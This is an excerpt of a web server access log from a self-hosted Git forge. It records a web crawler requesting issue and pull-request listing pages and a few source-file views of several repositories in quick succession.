"Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/pulls?assignee=1&labels=0&milestone=-1&sort=leastcomment&state=closed&type=all" +[17/Feb/2026:17:42:05 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/pulls?labels=0&milestone=-1&sort=leastcomment&state=closed&type=all" [Client 74.7.227.38] [Length 10050] [Gzip 3.53] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/pulls?assignee=1&labels=0&milestone=-1&sort=leastcomment&state=closed&type=all" +[17/Feb/2026:17:42:06 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/pulls?assignee=%28none%29&labels=0&sort=leastcomment&state=open&type=all" [Client 74.7.227.38] [Length 10041] [Gzip 3.54] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/pulls?assignee=1&labels=0&sort=leastcomment&state=open&type=all" +[17/Feb/2026:17:42:06 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/pulls?labels=0&milestone=-1&sort=mostcomment&state=open&type=all" [Client 74.7.227.38] [Length 10031] [Gzip 3.54] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/pulls?labels=0&milestone=-1&sort=leastcomment&state=open&type=all" +[17/Feb/2026:17:42:07 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/pulls?assignee=1&labels=0&sort=mostcomment&state=open&type=all" [Client 74.7.227.38] [Length 10023] [Gzip 3.53] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/pulls?assignee=1&labels=0&sort=leastcomment&state=open&type=all" +[17/Feb/2026:17:42:07 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/pulls?assignee=1&labels=0&project=-1&sort=leastcomment&state=open&type=all" [Client 74.7.227.38] [Length 10057] [Gzip 3.55] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/pulls?assignee=1&labels=0&sort=leastcomment&state=open&type=all" +[17/Feb/2026:17:42:08 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/pulls?assignee=1&labels=0&sort=oldest&state=open&type=all" [Client 74.7.227.38] [Length 10015] [Gzip 3.52] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/pulls?assignee=1&labels=0&sort=leastcomment&state=open&type=all" +[17/Feb/2026:17:42:08 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/issues?labels=0&sort=farduedate&state=all&type=all" [Client 74.7.227.38] [Length 10169] [Gzip 3.43] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/issues?sort=farduedate&state=all&type=all" +[17/Feb/2026:17:42:09 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/pulls?assignee=%28any%29&labels=0&sort=oldest&state=open&type=all" [Client 74.7.227.38] [Length 10037] [Gzip 3.53] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/pulls?assignee=%28any%29&labels=0&sort=leastcomment&state=open&type=all" +[17/Feb/2026:17:42:10 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/pulls?assignee=%28any%29&labels=0&sort=leastcomment&state=closed&type=all" [Client 74.7.227.38] [Length 10067] [Gzip 3.54] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/pulls?assignee=%28any%29&labels=0&sort=leastcomment&state=open&type=all" +[17/Feb/2026:17:42:10 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/pulls?labels=0&sort=mostcomment&state=all&type=all" [Client 74.7.227.38] [Length 9984] [Gzip 3.49] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/pulls?sort=mostcomment&state=all&type=all" +[17/Feb/2026:17:42:11 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/pulls?assignee=%28none%29&labels=0&sort=leastcomment&state=closed&type=all" [Client 74.7.227.38] [Length 10066] [Gzip 3.54] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/pulls?assignee=1&labels=0&sort=leastcomment&state=closed&type=all" +[17/Feb/2026:17:42:11 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/pulls?labels=0&milestone=-1&sort=mostcomment&state=closed&type=all" [Client 74.7.227.38] [Length 10047] [Gzip 3.53] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/pulls?labels=0&milestone=-1&sort=leastcomment&state=closed&type=all" +[17/Feb/2026:17:42:12 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/pulls?assignee=%28none%29&labels=0&sort=oldest&state=open&type=all" [Client 74.7.227.38] [Length 10037] [Gzip 3.53] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/pulls?assignee=%28none%29&labels=0&sort=leastcomment&state=open&type=all" +[17/Feb/2026:17:42:12 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/pulls?assignee=1&labels=0&sort=mostcomment&state=closed&type=all" [Client 74.7.227.38] [Length 10044] [Gzip 3.53] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/pulls?assignee=1&labels=0&sort=leastcomment&state=closed&type=all" +[17/Feb/2026:17:42:13 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/pulls?assignee=1&labels=0&sort=oldest&state=closed&type=all" [Client 74.7.227.38] [Length 10045] [Gzip 3.52] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/pulls?assignee=1&labels=0&sort=leastcomment&state=closed&type=all" +[17/Feb/2026:17:42:13 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/pulls?assignee=1&labels=0&project=-1&sort=mostcomment&state=open&type=all" [Client 74.7.227.38] [Length 10051] [Gzip 3.55] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/pulls?assignee=1&labels=0&sort=mostcomment&state=open&type=all" +[17/Feb/2026:17:42:14 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/pulls?labels=0&sort=mostcomment&state=all&type=all" [Client 74.7.227.38] [Length 9988] [Gzip 3.49] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/pulls?sort=mostcomment&state=all&type=all" +[17/Feb/2026:17:42:14 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/pulls?labels=0&sort=nearduedate&state=all&type=all" [Client 74.7.227.38] [Length 9952] [Gzip 3.50] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/pulls?assignee=%28any%29&labels=0&sort=nearduedate&state=all&type=all" +[17/Feb/2026:17:42:15 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/pulls?assignee=%28any%29&labels=0&sort=oldest&state=closed&type=all" [Client 74.7.227.38] [Length 10063] [Gzip 3.53] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/pulls?assignee=%28any%29&labels=0&sort=oldest&state=open&type=all" +[17/Feb/2026:17:42:15 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/pulls?assignee=%28any%29&labels=0&sort=nearduedate&state=closed&type=all" [Client 74.7.227.38] [Length 10037] [Gzip 3.54] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/pulls?assignee=%28any%29&labels=0&sort=leastcomment&state=closed&type=all" +[17/Feb/2026:17:42:16 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/issues?assignee=1&sort=oldest&state=all&type=all" [Client 74.7.227.38] [Length 10154] [Gzip 3.43] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/issues?sort=oldest&state=all&type=all" +[17/Feb/2026:17:42:16 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/pulls?assignee=%28none%29&labels=0&sort=oldest&state=closed&type=all" [Client 74.7.227.38] [Length 10065] [Gzip 3.53] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/pulls?assignee=%28none%29&labels=0&sort=leastcomment&state=closed&type=all" +[17/Feb/2026:17:42:17 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/pulls?labels=0&sort=farduedate&state=all&type=all" [Client 74.7.227.38] [Length 9952] [Gzip 3.50] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/pulls?sort=farduedate&state=all&type=all" +[17/Feb/2026:17:42:17 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/pulls?labels=0&sort=nearduedate&state=all&type=all" [Client 74.7.227.38] [Length 9950] [Gzip 3.50] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/pulls?sort=nearduedate&state=all&type=all" +[17/Feb/2026:17:42:18 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/pulls?assignee=1&labels=0&project=-1&sort=mostcomment&state=closed&type=all" [Client 74.7.227.38] [Length 10079] [Gzip 3.54] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/pulls?assignee=1&labels=0&sort=mostcomment&state=closed&type=all" +[17/Feb/2026:17:42:18 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/pulls?labels=0&sort=leastupdate&state=all&type=all" [Client 74.7.227.38] [Length 9993] [Gzip 3.49] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/pulls?sort=leastupdate&state=all&type=all" +[17/Feb/2026:17:42:19 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/pulls?labels=0&project=-1&sort=mostcomment&state=open&type=all" [Client 74.7.227.38] [Length 10029] [Gzip 3.53] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/pulls?assignee=1&labels=0&project=-1&sort=mostcomment&state=open&type=all" +[17/Feb/2026:17:42:20 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/issues?assignee=1&sort=oldest&state=all&type=all" [Client 74.7.227.38] [Length 10157] [Gzip 3.43] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/issues?sort=oldest&state=all&type=all" +[17/Feb/2026:17:42:20 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/issues?labels=0&sort=farduedate&state=all&type=all" [Client 74.7.227.38] [Length 10167] [Gzip 3.43] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/issues?sort=farduedate&state=all&type=all" +[17/Feb/2026:17:42:21 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/pulls?labels=0&sort=leastupdate&state=all&type=all" [Client 74.7.227.38] [Length 9995] [Gzip 3.49] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/pulls?sort=leastupdate&state=all&type=all" +[17/Feb/2026:17:42:21 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/branch/main/GoldMonitor/gold_monitor.log?display=rendered" [Client 74.7.227.38] [Length 11110] [Gzip 3.02] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldMonitor/gold_monitor.log" +[17/Feb/2026:17:42:22 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/issues?assignee=1&sort=latest&state=all&type=all" [Client 74.7.227.38] [Length 10151] [Gzip 3.43] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/issues?assignee=1&sort=oldest&state=all&type=all" +[17/Feb/2026:17:42:22 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/branch/main/PostgresPatrol/build_exe.bat?display=rendered" [Client 74.7.227.38] [Length 11124] [Gzip 3.03] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/PostgresPatrol/build_exe.bat" +[17/Feb/2026:17:42:23 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/branch/main/asset_pilot_docker/Dockerfile?display=rendered" [Client 74.7.227.38] [Length 11155] [Gzip 3.02] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/branch/main/asset_pilot_docker/Dockerfile" +[17/Feb/2026:17:42:24 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d?files=GoldPilot%2fdata_fetcher%2f__pycache__" [Client 74.7.227.38] [Length 21822] [Gzip 4.36] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/commits/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldPilot/data_fetcher/__pycache__" +[17/Feb/2026:17:42:25 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/pulls?labels=0&project=-1&sort=mostcomment&state=closed&type=all" [Client 74.7.227.38] [Length 10055] [Gzip 3.53] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/pulls?assignee=1&labels=0&project=-1&sort=mostcomment&state=closed&type=all" +[17/Feb/2026:17:42:25 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/63aec54418d3c1735d68bf046c7a9e78a247798d/html/pages/DCS.html?display=source" [Client 74.7.227.38] [Length 22743] [Gzip 7.12] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/63aec54418d3c1735d68bf046c7a9e78a247798d/html/pages/DCS.html" +[17/Feb/2026:17:42:26 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/pulls?labels=0&project=-1&sort=oldest&state=open&type=all" [Client 74.7.227.38] [Length 10027] [Gzip 3.52] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/pulls?labels=0&project=-1&sort=mostcomment&state=open&type=all" +[17/Feb/2026:17:42:26 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/issues?labels=0&sort=leastcomment&state=all&type=all" [Client 74.7.227.38] [Length 10173] [Gzip 3.44] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/issues?sort=leastcomment&state=all&type=all" +[17/Feb/2026:17:42:27 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/issues?labels=0&sort=recentupdate&state=all&type=all" [Client 74.7.227.38] [Length 10172] [Gzip 3.44] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/issues?sort=recentupdate&state=all&type=all" +[17/Feb/2026:17:42:27 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/pulls?assignee=1&sort=nearduedate&state=all&type=all" [Client 74.7.227.38] [Length 9941] [Gzip 3.51] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/pulls?sort=nearduedate&state=all&type=all" +[17/Feb/2026:17:42:28 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/pulls?labels=0&sort=recentupdate&state=all&type=all" [Client 74.7.227.38] [Length 9982] [Gzip 3.49] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/pulls?sort=recentupdate&state=all&type=all" +[17/Feb/2026:17:42:28 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/issues?labels=0&sort=leastcomment&state=all&type=all" [Client 74.7.227.38] [Length 10170] [Gzip 3.44] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/issues?sort=leastcomment&state=all&type=all" +[17/Feb/2026:17:42:29 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/issues?assignee=1&sort=farduedate&state=all&type=all" [Client 74.7.227.38] [Length 10158] [Gzip 3.44] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/issues?sort=farduedate&state=all&type=all" +[17/Feb/2026:17:42:29 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/pulls?assignee=1&sort=nearduedate&state=all&type=all" [Client 74.7.227.38] [Length 9945] [Gzip 3.51] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/pulls?assignee=1&state=all&type=all" +[17/Feb/2026:17:42:30 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/pulls?assignee=1&sort=farduedate&state=all&type=all" [Client 74.7.227.38] [Length 9942] [Gzip 3.51] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/pulls?sort=farduedate&state=all&type=all" +[17/Feb/2026:17:42:30 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/pulls?labels=0&project=-1&sort=oldest&state=closed&type=all" [Client 74.7.227.38] [Length 10052] [Gzip 3.52] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/pulls?labels=0&project=-1&sort=mostcomment&state=closed&type=all" +[17/Feb/2026:17:42:31 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/pulls?labels=0&sort=recentupdate&state=all&type=all" [Client 74.7.227.38] [Length 9985] [Gzip 3.49] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/pulls?sort=recentupdate&state=all&type=all" +[17/Feb/2026:17:42:31 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/pulls?assignee=1&sort=leastupdate&state=all&type=all" [Client 74.7.227.38] [Length 9977] [Gzip 3.49] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/pulls?sort=leastupdate&state=all&type=all" +[17/Feb/2026:17:42:32 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/issues?labels=0&sort=nearduedate&state=all&type=all" [Client 74.7.227.38] [Length 10168] [Gzip 3.44] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/issues?assignee=1&labels=0&sort=nearduedate&state=all&type=all" +[17/Feb/2026:17:42:32 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/issues?labels=0&sort=mostcomment&state=all&type=all" [Client 74.7.227.38] [Length 10166] [Gzip 3.44] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/issues?sort=mostcomment&state=all&type=all" +[17/Feb/2026:17:42:33 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/issues?labels=0&sort=leastupdate&state=all&type=all" [Client 74.7.227.38] [Length 10175] [Gzip 3.43] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/issues?sort=leastupdate&state=all&type=all" +[17/Feb/2026:17:42:34 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/issues?labels=0&sort=recentupdate&state=all&type=all" [Client 74.7.227.38] [Length 10170] [Gzip 3.44] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/issues?sort=recentupdate&state=all&type=all" +[17/Feb/2026:17:42:34 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/pulls?labels=0&sort=leastcomment&state=all&type=all" [Client 74.7.227.38] [Length 9985] [Gzip 3.49] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/pulls?sort=leastcomment&state=all&type=all" +[17/Feb/2026:17:42:35 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/pulls?assignee=1&sort=farduedate&state=all&type=all" [Client 74.7.227.38] [Length 9944] [Gzip 3.50] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/pulls?assignee=1&state=all&type=all" +[17/Feb/2026:17:42:35 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/pulls?assignee=1&sort=mostcomment&state=all&type=all" [Client 74.7.227.38] [Length 9968] [Gzip 3.50] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/pulls?sort=mostcomment&state=all&type=all" +[17/Feb/2026:17:42:36 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/issues?labels=0&sort=mostcomment&state=all&type=all" [Client 74.7.227.38] [Length 10163] [Gzip 3.44] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/issues?sort=mostcomment&state=all&type=all" +[17/Feb/2026:17:42:36 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/issues?labels=0&sort=nearduedate&state=all&type=all" [Client 74.7.227.38] [Length 10165] [Gzip 3.44] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/issues?sort=nearduedate&state=all&type=all" +[17/Feb/2026:17:42:37 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/issues?labels=0&sort=leastupdate&state=all&type=all" [Client 74.7.227.38] [Length 10171] [Gzip 3.43] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/issues?sort=leastupdate&state=all&type=all" +[17/Feb/2026:17:42:37 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/pulls?assignee=1&sort=leastupdate&state=all&type=all" [Client 74.7.227.38] [Length 9979] [Gzip 3.49] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/pulls?assignee=1&state=all&type=all" +[17/Feb/2026:17:42:38 